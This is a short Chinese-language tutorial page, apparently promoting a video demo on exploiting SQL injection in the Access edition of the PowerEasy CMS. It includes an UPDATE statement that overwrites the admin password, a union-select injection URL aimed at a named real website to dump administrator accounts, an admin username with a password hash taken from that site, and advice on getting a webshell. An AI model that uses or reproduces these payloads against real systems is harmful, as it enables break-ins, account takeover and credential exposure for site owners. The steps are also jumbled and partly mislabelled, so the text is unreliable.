动画介绍:
update PE_Admin set Password=’13955235245b2497’ where id=2--
如果不可以列目录就插管理员,但我喜欢直接update管理员密码,拿完shell后改回来,或去加一个
如果可以列目录就直接找web目录,然后用nb的getwebshell就可以拿到webshell了
下面我演示一下access版本的动易系统漏洞的利用,其实下面语句就是基本的注入语句。
用这个站作演示:http://www.173yz.com
还是一个游戏网!
(1):先暴所有管理员帐号。
我们先在后面加入以后代码
/Region.asp?Country=tt&City=whytt&Province=shi’+
and+1=2+union+select+username+from+PE_Admin+where+1<2+and+’1’=’1
先暴所有管理员帐号。
管理员的密码出来了:admin
(2)接下来我们先爆出管理员的密码
admin的密码: 7dc102e3a1309a39
| 
安全中国首页 > 动画中心 > 动易动画
